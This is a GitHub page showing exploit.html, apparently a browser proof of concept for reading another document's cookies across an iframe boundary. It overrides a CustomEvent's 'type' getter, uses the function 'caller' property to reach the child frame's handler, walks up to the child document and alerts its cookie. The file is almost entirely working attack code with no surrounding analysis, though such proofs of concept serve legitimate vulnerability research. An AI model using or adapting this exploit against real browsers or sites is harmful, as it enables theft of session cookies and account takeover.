-
Notifications
You must be signed in to change notification settings - Fork 87
/
Copy pathexploit.html
40 lines (33 loc) · 1.03 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<html>
<body>
<iframe src="http://localhost:8000/child.html"
width="300px" height="300px"></iframe>
<script>
var ev = new CustomEvent('click');
var _type = ev.type;
var childDoc;
var haveGot = false;
var t;
// Setup the event to re-call the event handler
Object.defineProperty(ev, 'type', {
get: function getType() {
// Make sure we don't loop forever
if (!haveGot) {
haveGot = true;
// Directly get the return value
var tmp = getType.caller({ type: 'click' })
childDoc = tmp.parentNode.parentNode.parentNode;
alert("Stolen: " + childDoc.cookie)
}
return _type;
}
});
// Let the child document load
setTimeout(function () {
// Dispatch the prepared event on the iframe window
var iframe = document.getElementsByTagName('iframe')[0];
window.dispatchEvent.call(iframe.contentWindow, ev);
}, 1000);
</script>
</body>
</html>